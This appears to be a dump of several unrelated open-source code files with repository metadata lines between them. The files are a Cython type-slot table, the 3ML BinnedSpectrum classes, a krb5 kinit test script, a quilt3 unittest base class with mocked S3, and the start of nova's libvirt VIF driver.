setattrofunc = Signature("TOO", 'r') # typedef int (*setattrofunc)(PyObject *, PyObject *, PyObject *);
delattrofunc = Signature("TO", 'r')
cmpfunc = Signature("TO", "i") # typedef int (*cmpfunc)(PyObject *, PyObject *);
reprfunc = Signature("T", "O") # typedef PyObject *(*reprfunc)(PyObject *);
hashfunc = Signature("T", "h") # typedef Py_hash_t (*hashfunc)(PyObject *);
# typedef PyObject *(*richcmpfunc) (PyObject *, PyObject *, int);
richcmpfunc = Signature("OOi", "O") # typedef PyObject *(*richcmpfunc) (PyObject *, PyObject *, int);
getiterfunc = Signature("T", "O") # typedef PyObject *(*getiterfunc) (PyObject *);
iternextfunc = Signature("T", "O") # typedef PyObject *(*iternextfunc) (PyObject *);
descrgetfunc = Signature("TOO", "O") # typedef PyObject *(*descrgetfunc) (PyObject *, PyObject *, PyObject *);
descrsetfunc = Signature("TOO", 'r') # typedef int (*descrsetfunc) (PyObject *, PyObject *, PyObject *);
descrdelfunc = Signature("TO", 'r')
initproc = Signature("T*", 'r') # typedef int (*initproc)(PyObject *, PyObject *, PyObject *);
# typedef PyObject *(*newfunc)(struct _typeobject *, PyObject *, PyObject *);
# typedef PyObject *(*allocfunc)(struct _typeobject *, int);
getbufferproc = Signature("TBi", "r") # typedef int (*getbufferproc)(PyObject *, Py_buffer *, int);
releasebufferproc = Signature("TB", "v") # typedef void (*releasebufferproc)(PyObject *, Py_buffer *);
#------------------------------------------------------------------------------------------
#
# Signatures for accessor methods of properties.
#
#------------------------------------------------------------------------------------------
property_accessor_signatures = {
'__get__': Signature("T", "O"),
'__set__': Signature("TO", 'r'),
'__del__': Signature("T", 'r')
}
#------------------------------------------------------------------------------------------
#
# Descriptor tables for the slots of the various type object
# substructures, in the order they appear in the structure.
#
#------------------------------------------------------------------------------------------
PyNumberMethods = (
MethodSlot(binaryfunc, "nb_add", "__add__"),
MethodSlot(binaryfunc, "nb_subtract", "__sub__"),
MethodSlot(binaryfunc, "nb_multiply", "__mul__"),
MethodSlot(binaryfunc, "nb_divide", "__div__", py3 = False),
MethodSlot(binaryfunc, "nb_remainder", "__mod__"),
MethodSlot(binaryfunc, "nb_divmod", "__divmod__"),
MethodSlot(ternaryfunc, "nb_power", "__pow__"),
MethodSlot(unaryfunc, "nb_negative", "__neg__"),
MethodSlot(unaryfunc, "nb_positive", "__pos__"),
MethodSlot(unaryfunc, "nb_absolute", "__abs__"),
MethodSlot(inquiry, "nb_nonzero", "__nonzero__", py3 = ("nb_bool", "__bool__")),
MethodSlot(unaryfunc, "nb_invert", "__invert__"),
MethodSlot(binaryfunc, "nb_lshift", "__lshift__"),
MethodSlot(binaryfunc, "nb_rshift", "__rshift__"),
MethodSlot(binaryfunc, "nb_and", "__and__"),
MethodSlot(binaryfunc, "nb_xor", "__xor__"),
MethodSlot(binaryfunc, "nb_or", "__or__"),
EmptySlot("nb_coerce", py3 = False),
MethodSlot(unaryfunc, "nb_int", "__int__", fallback="__long__"),
MethodSlot(unaryfunc, "nb_long", "__long__", fallback="__int__", py3 = "<RESERVED>"),
MethodSlot(unaryfunc, "nb_float", "__float__"),
MethodSlot(unaryfunc, "nb_oct", "__oct__", py3 = False),
MethodSlot(unaryfunc, "nb_hex", "__hex__", py3 = False),
# Added in release 2.0
MethodSlot(ibinaryfunc, "nb_inplace_add", "__iadd__"),
MethodSlot(ibinaryfunc, "nb_inplace_subtract", "__isub__"),
MethodSlot(ibinaryfunc, "nb_inplace_multiply", "__imul__"),
MethodSlot(ibinaryfunc, "nb_inplace_divide", "__idiv__", py3 = False),
MethodSlot(ibinaryfunc, "nb_inplace_remainder", "__imod__"),
MethodSlot(ibinaryfunc, "nb_inplace_power", "__ipow__"), # actually ternaryfunc!!!
MethodSlot(ibinaryfunc, "nb_inplace_lshift", "__ilshift__"),
MethodSlot(ibinaryfunc, "nb_inplace_rshift", "__irshift__"),
MethodSlot(ibinaryfunc, "nb_inplace_and", "__iand__"),
MethodSlot(ibinaryfunc, "nb_inplace_xor", "__ixor__"),
MethodSlot(ibinaryfunc, "nb_inplace_or", "__ior__"),
# Added in release 2.2
# The following require the Py_TPFLAGS_HAVE_CLASS flag
MethodSlot(binaryfunc, "nb_floor_divide", "__floordiv__"),
MethodSlot(binaryfunc, "nb_true_divide", "__truediv__"),
MethodSlot(ibinaryfunc, "nb_inplace_floor_divide", "__ifloordiv__"),
MethodSlot(ibinaryfunc, "nb_inplace_true_divide", "__itruediv__"),
# Added in release 2.5
MethodSlot(unaryfunc, "nb_index", "__index__", ifdef = "PY_VERSION_HEX >= 0x02050000")
)
PySequenceMethods = (
MethodSlot(lenfunc, "sq_length", "__len__"),
EmptySlot("sq_concat"), # nb_add used instead
EmptySlot("sq_repeat"), # nb_multiply used instead
SyntheticSlot("sq_item", ["__getitem__"], "0"), #EmptySlot("sq_item"), # mp_subscript used instead
MethodSlot(ssizessizeargfunc, "sq_slice", "__getslice__"),
EmptySlot("sq_ass_item"), # mp_ass_subscript used instead
SyntheticSlot("sq_ass_slice", ["__setslice__", "__delslice__"], "0"),
MethodSlot(cmpfunc, "sq_contains", "__contains__"),
EmptySlot("sq_inplace_concat"), # nb_inplace_add used instead
EmptySlot("sq_inplace_repeat"), # nb_inplace_multiply used instead
)
PyMappingMethods = (
MethodSlot(lenfunc, "mp_length", "__len__"),
MethodSlot(objargfunc, "mp_subscript", "__getitem__"),
SyntheticSlot("mp_ass_subscript", ["__setitem__", "__delitem__"], "0"),
)
PyBufferProcs = (
MethodSlot(readbufferproc, "bf_getreadbuffer", "__getreadbuffer__", py3 = False),
MethodSlot(writebufferproc, "bf_getwritebuffer", "__getwritebuffer__", py3 = False),
MethodSlot(segcountproc, "bf_getsegcount", "__getsegcount__", py3 = False),
MethodSlot(charbufferproc, "bf_getcharbuffer", "__getcharbuffer__", py3 = False),
MethodSlot(getbufferproc, "bf_getbuffer", "__getbuffer__", ifdef = "PY_VERSION_HEX >= 0x02060000"),
MethodSlot(releasebufferproc, "bf_releasebuffer", "__releasebuffer__", ifdef = "PY_VERSION_HEX >= 0x02060000")
)
#------------------------------------------------------------------------------------------
#
# The main slot table. This table contains descriptors for all the
# top-level type slots, beginning with tp_dealloc, in the order they
# appear in the type object.
#
#------------------------------------------------------------------------------------------
slot_table = (
ConstructorSlot("tp_dealloc", '__dealloc__'),
EmptySlot("tp_print"), #MethodSlot(printfunc, "tp_print", "__print__"),
EmptySlot("tp_getattr"),
EmptySlot("tp_setattr"),
MethodSlot(cmpfunc, "tp_compare", "__cmp__", py3 = '<RESERVED>'),
MethodSlot(reprfunc, "tp_repr", "__repr__"),
SuiteSlot(PyNumberMethods, "PyNumberMethods", "tp_as_number"),
SuiteSlot(PySequenceMethods, "PySequenceMethods", "tp_as_sequence"),
SuiteSlot(PyMappingMethods, "PyMappingMethods", "tp_as_mapping"),
MethodSlot(hashfunc, "tp_hash", "__hash__"),
MethodSlot(callfunc, "tp_call", "__call__"),
MethodSlot(reprfunc, "tp_str", "__str__"),
SyntheticSlot("tp_getattro", ["__getattr__","__getattribute__"], "0"), #"PyObject_GenericGetAttr"),
SyntheticSlot("tp_setattro", ["__setattr__", "__delattr__"], "0"), #"PyObject_GenericSetAttr"),
SuiteSlot(PyBufferProcs, "PyBufferProcs", "tp_as_buffer"),
TypeFlagsSlot("tp_flags"),
DocStringSlot("tp_doc"),
GCDependentSlot("tp_traverse"),
GCDependentSlot("tp_clear"),
# Later -- synthesize a method to split into separate ops?
MethodSlot(richcmpfunc, "tp_richcompare", "__richcmp__"),
EmptySlot("tp_weaklistoffset"),
MethodSlot(getiterfunc, "tp_iter", "__iter__"),
MethodSlot(iternextfunc, "tp_iternext", "__next__"),
MethodTableSlot("tp_methods"),
MemberTableSlot("tp_members"),
GetSetSlot("tp_getset"),
BaseClassSlot("tp_base"), #EmptySlot("tp_base"),
EmptySlot("tp_dict"),
SyntheticSlot("tp_descr_get", ["__get__"], "0"),
SyntheticSlot("tp_descr_set", ["__set__", "__delete__"], "0"),
EmptySlot("tp_dictoffset"),
MethodSlot(initproc, "tp_init", "__init__"),
EmptySlot("tp_alloc"), #FixedSlot("tp_alloc", "PyType_GenericAlloc"),
InternalMethodSlot("tp_new"),
EmptySlot("tp_free"),
EmptySlot("tp_is_gc"),
EmptySlot("tp_bases"),
EmptySlot("tp_mro"),
EmptySlot("tp_cache"),
EmptySlot("tp_subclasses"),
EmptySlot("tp_weaklist"),
EmptySlot("tp_del"),
EmptySlot("tp_version_tag", ifdef="PY_VERSION_HEX >= 0x02060000"),
)
#------------------------------------------------------------------------------------------
#
# Descriptors for special methods which don't appear directly
# in the type object or its substructures. These methods are
# called from slot functions synthesized by Cython.
#
#------------------------------------------------------------------------------------------
MethodSlot(initproc, "", "__cinit__")
MethodSlot(destructor, "", "__dealloc__")
MethodSlot(objobjargproc, "", "__setitem__")
MethodSlot(objargproc, "", "__delitem__")
MethodSlot(ssizessizeobjargproc, "", "__setslice__")
MethodSlot(ssizessizeargproc, "", "__delslice__")
MethodSlot(getattrofunc, "", "__getattr__")
MethodSlot(setattrofunc, "", "__setattr__")
MethodSlot(delattrofunc, "", "__delattr__")
MethodSlot(descrgetfunc, "", "__get__")
MethodSlot(descrsetfunc, "", "__set__")
MethodSlot(descrdelfunc, "", "__delete__")
# Method flags for python-exposed methods.
method_noargs = "METH_NOARGS"
method_onearg = "METH_O"
method_varargs = "METH_VARARGS"
method_keywords = "METH_KEYWORDS"
method_coexist = "METH_COEXIST"
| apache-2.0 | 73,553,137,307,292,590 | 39.293734 | 133 | 0.573692 | false |
volodymyrss/3ML | threeML/plugins/spectrum/binned_spectrum.py | 1 | 20977 | import numpy as np
import pandas as pd
from threeML.utils.histogram import Histogram
from threeML.utils.interval import Interval, IntervalSet
from threeML.plugins.OGIP.response import InstrumentResponse
from threeML.utils.stats_tools import sqrt_sum_of_squares
class Channel(Interval):
@property
def channel_width(self):
return self._get_width()
class ChannelSet(IntervalSet):
INTERVAL_TYPE = Channel
@classmethod
def from_instrument_response(cls, instrument_response):
"""
Build EBOUNDS interval from an instrument response
:param instrument_response:
:return:
"""
new_ebounds = cls.from_list_of_edges(instrument_response.ebounds)
return new_ebounds
@property
def channels_widths(self):
return np.array([channel.channel_width for channel in self._intervals ])
class Quality(object):
def __init__(self, quality):
"""
simple class to formalize the quality flags used in spectra
:param quality: a quality array
"""
#total_length = len(quality)
n_elements = 1
for dim in quality.shape:
n_elements *= dim
good = quality == 'good'
warn = quality == 'warn'
bad = quality == 'bad'
assert n_elements == good.sum() + warn.sum() + bad.sum(), 'quality can only contain "good", "warn", and "bad"'
self._good = good
self._warn = warn
self._bad = bad
self._quality = quality
def __len__(self):
return len(self._quality)
def get_slice(self, idx):
return Quality(self._quality[idx,:])
@property
def good(self):
return self._good
@property
def warn(self):
return self._warn
@property
def bad(self):
return self._bad
@property
def n_elements(self):
return len(self._quality)
@classmethod
def from_ogip(cls, ogip_quality):
good = ogip_quality == 0
warn = ogip_quality == 2
bad = np.logical_and(~good, ~warn)
quality = np.empty_like(ogip_quality,dtype='|S4')
quality[:] = 'good'
# quality = np.array(['good' for i in xrange(len(ogip_quality))])
#quality[good] = 'good'
quality[warn] = 'warn'
quality[bad] = 'bad'
return cls(quality)
def to_ogip(self):
"""
makes a quality array following the OGIP standards:
0 = good
2 = warn
5 = bad
:return:
"""
ogip_quality = np.zeros(self._quality.shape,dtype=np.int32)
ogip_quality[self.warn] = 2
ogip_quality[self.bad] = 5
return ogip_quality
@classmethod
def create_all_good(cls, n_channels):
"""
construct a quality object with all good channels
:param n_channels:
:return:
"""
quality = np.array(['good' for i in xrange(int(n_channels))])
return cls(quality)
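# Hedged sketch (illustrative, not part of the original module): round-trip
# between OGIP integer flags (0 = good, 2 = warn, 5 = bad) and the 3ML
# Quality type.
def _demo_quality_roundtrip():
    ogip = np.array([0, 0, 2, 5, 0], dtype=np.int32)
    q = Quality.from_ogip(ogip)
    assert q.good.sum() == 3 and q.warn.sum() == 1 and q.bad.sum() == 1
    assert (q.to_ogip() == ogip).all()
    return q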
class BinnedSpectrum(Histogram):
INTERVAL_TYPE = Channel
def __init__(self, counts, exposure, ebounds, count_errors=None, sys_errors=None, quality=None, scale_factor=1.,
is_poisson=False, mission=None, instrument=None, tstart=None, tstop=None):
"""
A general binned histogram of either Poisson or non-Poisson rates. While the input is in counts, 3ML spectra work
in rates, so this class uses the exposure to construct the rates from the counts.
:param counts: an array of counts
:param exposure: the exposure for the counts
:param ebounds: the len(counts) + 1 energy edges of the histogram or an instance of EBOUNDSIntervalSet
:param count_errors: (optional) the count errors for the spectra
:param sys_errors: (optional) systematic errors on the spectrum
:param quality: quality instance marking good, bad and warned channels. If not provided, all channels are assumed to be good
:param scale_factor: scaling parameter of the spectrum
:param is_poisson: if the histogram is Poisson
:param mission: the mission name
:param instrument: the instrument name
"""
# attach the parameters ot the object
self._is_poisson = is_poisson
self._exposure = exposure
self._scale_factor = scale_factor
# if we do not have a ChannelSet,
if not isinstance(ebounds, ChannelSet):
# make one from the edges
ebounds = ChannelSet.from_list_of_edges(ebounds) #type: ChannelSet
if count_errors is not None:
assert not self._is_poisson, "Read count errors but spectrum marked Poisson"
# convert counts to rate
rate_errors = count_errors / self._exposure
else:
rate_errors = None
if sys_errors is None:
sys_errors = np.zeros_like(counts)
self._sys_errors = sys_errors
        # convert counts to rates
rates = counts / self._exposure
if quality is not None:
# check that we are using the 3ML quality type
assert isinstance(quality, Quality)
self._quality = quality
else:
# if there is no quality, then assume all channels are good
self._quality = Quality.create_all_good(len(rates))
if mission is None:
self._mission = 'UNKNOWN'
else:
self._mission = mission
if instrument is None:
self._instrument = 'UNKNOWN'
else:
self._instrument = instrument
self._tstart = tstart
self._tstop = tstop
# pass up to the binned spectrum
super(BinnedSpectrum, self).__init__(list_of_intervals=ebounds,
contents=rates,
errors=rate_errors,
sys_errors=sys_errors,
is_poisson=is_poisson)
@property
def n_channel(self):
return len(self)
@property
def rates(self):
"""
:return: rates per channel
"""
return self._contents
@property
def total_rate(self):
"""
:return: total rate
"""
return self._contents.sum()
@property
def total_rate_error(self):
"""
:return: total rate error
"""
assert self.is_poisson == False, "Cannot request errors on rates for a Poisson spectrum"
return sqrt_sum_of_squares(self._errors)
@property
def counts(self):
"""
:return: counts per channel
"""
return self._contents * self.exposure
@property
def count_errors(self):
"""
:return: count error per channel
"""
#VS: impact of this change is unclear to me, it seems to make sense and the tests pass
if self.is_poisson:
return None
else:
return self._errors * self.exposure
@property
def total_count(self):
"""
:return: total counts
"""
return self.counts.sum()
@property
def total_count_error(self):
"""
:return: total count error
"""
#VS: impact of this change is unclear to me, it seems to make sense and the tests pass
if self.is_poisson:
return None
else:
return sqrt_sum_of_squares(self.count_errors)
@property
def tstart(self):
return self._tstart
@property
def tstop(self):
return self._tstop
@property
def is_poisson(self):
return self._is_poisson
@property
def rate_errors(self):
"""
        If the spectrum has no Poisson error (POISSERR is False in the header), this will return the STAT_ERR column
:return: errors on the rates
"""
if self.is_poisson:
return None
else:
return self._errors
@property
def n_channels(self):
return len(self)
@property
def sys_errors(self):
"""
Systematic errors per channel. This is nonzero only if the SYS_ERR column is present in the input file.
:return: the systematic errors stored in the input spectrum
"""
return self._sys_errors
@property
def exposure(self):
"""
Exposure in seconds
:return: exposure
"""
return self._exposure
@property
def quality(self):
return self._quality
@property
def scale_factor(self):
return self._scale_factor
@property
def mission(self):
return self._mission
@property
def instrument(self):
return self._instrument
def clone(self, new_counts=None, new_count_errors=None, new_exposure=None):
"""
make a new spectrum with new counts and errors and all other
parameters the same
:param new_counts: new counts for the spectrum
:param new_count_errors: new errors from the spectrum
:return:
"""
if new_counts is None:
new_counts = self.counts
new_count_errors = self.count_errors
if new_exposure is None:
new_exposure = self.exposure
return BinnedSpectrum(counts=new_counts,
ebounds=ChannelSet.from_list_of_edges(self.edges),
exposure=new_exposure,
count_errors=new_count_errors,
sys_errors=self._sys_errors,
quality=self._quality,
scale_factor=self._scale_factor,
is_poisson=self._is_poisson,
mission=self._mission,
instrument=self._instrument)
@classmethod
def from_pandas(cls,pandas_dataframe,exposure,scale_factor=1.,is_poisson=False,mission=None,instrument=None):
"""
Build a spectrum from data contained within a pandas data frame.
The required columns are:
'emin': low energy bin edge
'emax': high energy bin edge
'counts': the counts in each bin
Optional column names are:
'count_errors': errors on the counts for non-Poisson data
'sys_errors': systematic error per channel
'quality' list of 3ML quality flags 'good', 'warn', 'bad'
:param pandas_dataframe: data frame containing information to be read into spectrum
:param exposure: the exposure of the spectrum
:param scale_factor: the scale factor of the spectrum
:param is_poisson: if the data are Poisson distributed
:param mission: (optional) the mission name
:param instrument: (optional) the instrument name
:return:
"""
# get the required columns
emin = np.array(pandas_dataframe['emin'])
emax = np.array(pandas_dataframe['emax'])
counts = np.array(pandas_dataframe['counts'])
ebounds = emin.tolist()
ebounds.append(emax[-1])
ebounds = ChannelSet.from_list_of_edges(ebounds)
# default optional parameters
count_errors = None
sys_errors = None
quality = None
if 'count_errors' in pandas_dataframe.keys():
count_errors = np.array(pandas_dataframe['count_errors'])
if 'sys_errors' in pandas_dataframe.keys():
sys_errors = np.array(pandas_dataframe['sys_errors'])
if 'quality' in pandas_dataframe.keys():
quality = Quality(np.array(pandas_dataframe['quality']))
return cls(counts=counts,
exposure=exposure,
ebounds=ebounds,
count_errors=count_errors,
sys_errors=sys_errors,
quality=quality,
scale_factor=scale_factor,
is_poisson=is_poisson,
mission=mission,
instrument=instrument)
def to_pandas(self,use_rate=True):
"""
make a pandas table from the spectrum.
:param use_rate: if the table should use rates or counts
:return:
"""
if use_rate:
out_name = 'rates'
out_values = self.rates
else:
out_name = 'counts'
out_values = self.rates * self.exposure
        # use the raw per-channel flag strings so that from_pandas can round-trip
        out_dict = {'emin': self.starts, 'emax': self.stops, out_name: out_values,
                    'quality': self._quality._quality}
        if self.rate_errors is not None:
            if use_rate:
                out_dict['rate_errors'] = self.rate_errors
            else:
                out_dict['count_errors'] = self.rate_errors * self.exposure
        if self.sys_errors is not None:
            out_dict['sys_errors'] = self.sys_errors
return pd.DataFrame(out_dict)
@classmethod
def from_time_series(cls, time_series, use_poly=False):
"""
:param time_series:
:param use_poly:
:return:
"""
raise NotImplementedError('This is still under construction')
pha_information = time_series.get_information_dict(use_poly)
is_poisson = True
if use_poly:
is_poisson = False
return cls(instrument=pha_information['instrument'],
mission=pha_information['telescope'],
tstart=pha_information['tstart'],
telapse=pha_information['telapse'],
#channel=pha_information['channel'],
counts=pha_information['counts'],
count_errors=pha_information['counts error'],
quality=pha_information['quality'],
grouping=pha_information['grouping'],
exposure=pha_information['exposure'],
backscale=1.,
is_poisson=is_poisson)
def __add__(self,other):
assert self == other, "The bins are not equal"
new_sys_errors=self.sys_errors
if new_sys_errors is None:
new_sys_errors=other.sys_errors
elif other.sys_errors is not None:
new_sys_errors += other.sys_errors
new_exposure = self.exposure + other.exposure
if self.count_errors is None and other.count_errors is None:
new_count_errors = None
else:
            assert self.count_errors is not None and other.count_errors is not None, 'only one of the two spectra has errors, cannot add!'
new_count_errors = (self.count_errors**2 + other.count_errors**2) ** 0.5
new_counts = self.counts + other.counts
new_spectrum = self.clone(new_counts=new_counts,
new_count_errors=new_count_errors,
new_exposure=new_exposure)
new_spectrum._tstart = min(self.tstart,other.tstart)
new_spectrum._tstop = max(self.tstop,other.tstop)
return new_spectrum
def add_inverse_variance_weighted(self, other):
assert self == other, "The bins are not equal"
if self.is_poisson or other.is_poisson:
raise Exception("Inverse_variance_weighting not implemented for poisson")
        new_sys_errors = self.sys_errors
        if new_sys_errors is None:
            new_sys_errors = other.sys_errors
        elif other.sys_errors is not None:
            new_sys_errors += other.sys_errors
new_exposure = self.exposure + other.exposure
        new_rate_errors = np.array([(e1 ** -2 + e2 ** -2) ** -0.5
                                    for e1, e2 in zip(self.rate_errors,
                                                      other.rate_errors)])
        new_rates = np.array([c1 * e1 ** -2 + c2 * e2 ** -2
                              for c1, e1, c2, e2 in zip(self.rates,
                                                        self.rate_errors,
                                                        other.rates,
                                                        other.rate_errors)]) * new_rate_errors ** 2
new_count_errors = new_rate_errors * new_exposure
new_counts = new_rates * new_exposure
        new_counts[np.isnan(new_counts)] = 0
        new_count_errors[np.isnan(new_count_errors)] = 0
new_spectrum = self.clone(new_counts=new_counts,
new_count_errors=new_count_errors)
new_spectrum._exposure = new_exposure
new_spectrum._tstart = min(self.tstart,other.tstart)
new_spectrum._tstop = max(self.tstop,other.tstop)
return new_spectrum
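    # A sketch of the standard inverse-variance formulas implemented above
    # (the notation here is illustrative, not from this module): with
    # per-bin rate errors sigma_i, the weights are w_i = 1 / sigma_i**2,
    # and per bin
    #     combined_error = (w_1 + w_2) ** -0.5
    #     combined_rate  = (w_1 * r_1 + w_2 * r_2) * combined_error ** 2
    # i.e. the weighted mean of the two rates, which is exactly what the
    # two list comprehensions compute before rescaling by the new exposure.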
class BinnedSpectrumWithDispersion(BinnedSpectrum):
def __init__(self, counts, exposure, response, count_errors=None, sys_errors=None, quality=None, scale_factor=1.,
is_poisson=False, mission=None, instrument=None, tstart=None, tstop=None ):
"""
A binned spectrum that must be deconvolved via a dispersion or response matrix
        :param counts: the counts in each channel
        :param exposure: the exposure of the spectrum
        :param response: the InstrumentResponse used to build the channel
            bounds and later deconvolve the spectrum
        :param count_errors: errors on the counts for non-Poisson data
        :param sys_errors: systematic error per channel
        :param quality: 3ML quality flags per channel
        :param scale_factor: the scale factor of the spectrum
        :param is_poisson: if the data are Poisson distributed
        :param mission: (optional) the mission name
        :param instrument: (optional) the instrument name
        :param tstart: (optional) start time of the observation
        :param tstop: (optional) stop time of the observation
        """
assert isinstance(response, InstrumentResponse), 'The response is not a valid instance of InstrumentResponse'
self._rsp = response
ebounds = ChannelSet.from_instrument_response(response)
super(BinnedSpectrumWithDispersion, self).__init__(counts=counts,
exposure=exposure,
ebounds=ebounds,
count_errors=count_errors,
sys_errors=sys_errors,
quality=quality,
scale_factor=scale_factor,
is_poisson=is_poisson,
mission=mission,
instrument=instrument,
tstart=tstart,
tstop=tstop)
@property
def response(self):
return self._rsp
@classmethod
def from_time_series(cls, time_series, response, use_poly=False):
"""
:param time_series:
:param use_poly:
:return:
"""
pha_information = time_series.get_information_dict(use_poly)
is_poisson = True
if use_poly:
is_poisson = False
return cls(instrument=pha_information['instrument'],
mission=pha_information['telescope'],
tstart=pha_information['tstart'],
tstop=pha_information['tstart'] + pha_information['telapse'],
#channel=pha_information['channel'],
counts =pha_information['counts'],
count_errors=pha_information['counts error'],
quality=pha_information['quality'],
#grouping=pha_information['grouping'],
exposure=pha_information['exposure'],
response=response,
scale_factor=1.,
is_poisson=is_poisson)
def clone(self, new_counts=None, new_count_errors=None, new_sys_errors=None, new_exposure=None):
"""
make a new spectrum with new counts and errors and all other
parameters the same
        :param new_counts: new counts for the spectrum
        :param new_count_errors: new errors from the spectrum
        :param new_sys_errors: new systematic errors for the spectrum
        :param new_exposure: new exposure for the spectrum
        :return:
"""
if new_counts is None:
new_counts = self.counts
new_count_errors = self.count_errors
if new_sys_errors is None:
new_sys_errors = self.sys_errors
if new_exposure is None:
new_exposure = self.exposure
return BinnedSpectrumWithDispersion(counts=new_counts,
exposure=new_exposure,
response=self._rsp,
count_errors=new_count_errors,
sys_errors=new_sys_errors,
quality=self._quality,
scale_factor=self._scale_factor,
is_poisson=self._is_poisson,
mission=self._mission,
instrument=self._instrument)
    def __add__(self, other):
#TODO implement equality in InstrumentResponse class
assert self.response is other.response
new_spectrum = super(BinnedSpectrumWithDispersion,self).__add__(other)
return new_spectrum
| bsd-3-clause | 6,971,004,834,332,659,000 | 27.194892 | 155 | 0.550794 | false |
drankye/kerb-token | krb5/src/tests/t_general.py | 1 | 2018 | #!/usr/bin/python
from k5test import *
for realm in multipass_realms(create_host=False):
# Check that kinit fails appropriately with the wrong password.
output = realm.run([kinit, realm.user_princ], input='wrong\n',
expected_code=1)
if 'Password incorrect while getting initial credentials' not in output:
fail('Expected error message not seen in kinit output')
# Check that we can kinit as a different principal.
realm.kinit(realm.admin_princ, password('admin'))
realm.klist(realm.admin_princ)
# Test FAST kinit.
fastpw = password('fast')
realm.run_kadminl('ank -pw %s +requires_preauth user/fast' % fastpw)
realm.kinit('user/fast', fastpw)
realm.kinit('user/fast', fastpw, flags=['-T', realm.ccache])
realm.klist('user/fast@%s' % realm.realm)
# Test kinit against kdb keytab
realm.run([kinit, "-k", "-t", "KDB:", realm.user_princ])
# Test that we can get initial creds with an empty password via the
# API. We have to disable the "empty" pwqual module to create a
# principal with an empty password. (Regression test for #7642.)
conf = {'plugins': {'pwqual': {'disable': 'empty'}}}
realm = K5Realm(create_user=False, create_host=False, krb5_conf=conf)
realm.run_kadminl('addprinc -pw "" user')
realm.run(['./t_init_creds', 'user', ''])
realm.stop()
realm = K5Realm(create_host=False)
# Spot-check KRB5_TRACE output
tracefile = os.path.join(realm.testdir, 'trace')
realm.run(['env', 'KRB5_TRACE=' + tracefile, kinit, realm.user_princ],
input=(password('user') + "\n"))
f = open(tracefile, 'r')
trace = f.read()
f.close()
expected = ('Sending initial UDP request',
'Received answer',
'Selected etype info',
'AS key obtained',
'Decrypted AS reply',
'FAST negotiation: available',
'Storing [email protected]')
for e in expected:
if e not in trace:
fail('Expected output not in kinit trace log')
success('FAST kinit, trace logging')
| apache-2.0 | -8,659,719,704,759,129,000 | 36.37037 | 76 | 0.654113 | false |
quiltdata/quilt-compiler | api/python/tests/utils.py | 1 | 2013 | """
Unittest setup
"""
import pathlib
from unittest import mock, TestCase
import boto3
from botocore import UNSIGNED
from botocore.client import Config
from botocore.stub import Stubber
import responses
import quilt3
from quilt3.util import CONFIG_PATH
class QuiltTestCase(TestCase):
"""
Base class for unittests.
- Creates a mock config
- Creates a test client
- Mocks requests
"""
def setUp(self):
# Verify that CONFIG_PATH is in the test dir (patched by conftest.py).
assert 'pytest' in str(CONFIG_PATH)
quilt3.config(
navigator_url='https://example.com',
apiGatewayEndpoint='https://xyz.execute-api.us-east-1.amazonaws.com/prod',
binaryApiGatewayEndpoint='https://xyz.execute-api.us-east-1.amazonaws.com/prod',
default_local_registry=pathlib.Path('.').resolve().as_uri() + '/local_registry',
default_remote_registry='s3://example/',
default_install_location=None,
defaultBucket='test-bucket',
registryUrl='https://registry.example.com',
s3Proxy='open-s3-proxy.quiltdata.com'
)
self.requests_mock = responses.RequestsMock(assert_all_requests_are_fired=False)
self.requests_mock.start()
# Create a dummy S3 client that (hopefully) can't do anything.
boto_client = boto3.client('s3', config=Config(signature_version=UNSIGNED))
self.s3_client = boto_client
self.s3_client_patcher = mock.patch.multiple(
'quilt3.data_transfer.S3ClientProvider',
standard_client=boto_client,
find_correct_client=lambda *args, **kwargs: boto_client,
)
self.s3_client_patcher.start()
self.s3_stubber = Stubber(self.s3_client)
self.s3_stubber.activate()
def tearDown(self):
self.s3_stubber.assert_no_pending_responses()
self.s3_stubber.deactivate()
self.s3_client_patcher.stop()
self.requests_mock.stop()
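    # Example usage (a minimal sketch; the test class and the stubbed call
    # below are hypothetical, not part of this module):
    #
    #   class MyFeatureTest(QuiltTestCase):
    #       def test_list(self):
    #           # requests and S3 are already mocked/stubbed by setUp, so
    #           # every outgoing call must be registered explicitly, e.g.:
    #           self.s3_stubber.add_response(
    #               'list_objects_v2',
    #               service_response={'Contents': []},
    #               expected_params={'Bucket': 'test-bucket'})
    #           ...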
| apache-2.0 | 8,618,915,299,598,966,000 | 32 | 92 | 0.64928 | false |
phenoxim/nova | nova/virt/libvirt/vif.py | 1 | 35641 | # Copyright (C) 2011 Midokura KK
# Copyright (C) 2011 Nicira, Inc
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
# Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""VIF drivers for libvirt."""
import os
import os_vif
from os_vif import exception as osv_exception
from os_vif.objects import fields as osv_fields
from oslo_concurrency import processutils
from oslo_log import log as logging
import nova.conf
from nova import exception
from nova.i18n import _
from nova.network import linux_net
from nova.network import linux_utils as linux_net_utils
from nova.network import model as network_model
from nova.network import os_vif_util
from nova import objects
from nova import profiler
from nova import utils
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import designer
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt import osinfo
LOG = logging.getLogger(__name__)
CONF = nova.conf.CONF
# vhostuser queues support
MIN_LIBVIRT_VHOSTUSER_MQ = (1, 2, 17)
# vlan tag for macvtap passthrough mode on SRIOV VFs
MIN_LIBVIRT_MACVTAP_PASSTHROUGH_VLAN = (1, 3, 5)
# virtio-net.rx_queue_size support
MIN_LIBVIRT_RX_QUEUE_SIZE = (2, 3, 0)
MIN_QEMU_RX_QUEUE_SIZE = (2, 7, 0)
# virtio-net.tx_queue_size support
MIN_LIBVIRT_TX_QUEUE_SIZE = (3, 7, 0)
MIN_QEMU_TX_QUEUE_SIZE = (2, 10, 0)
def is_vif_model_valid_for_virt(virt_type, vif_model):
valid_models = {
'qemu': [network_model.VIF_MODEL_VIRTIO,
network_model.VIF_MODEL_NE2K_PCI,
network_model.VIF_MODEL_PCNET,
network_model.VIF_MODEL_RTL8139,
network_model.VIF_MODEL_E1000,
network_model.VIF_MODEL_LAN9118,
network_model.VIF_MODEL_SPAPR_VLAN],
'kvm': [network_model.VIF_MODEL_VIRTIO,
network_model.VIF_MODEL_NE2K_PCI,
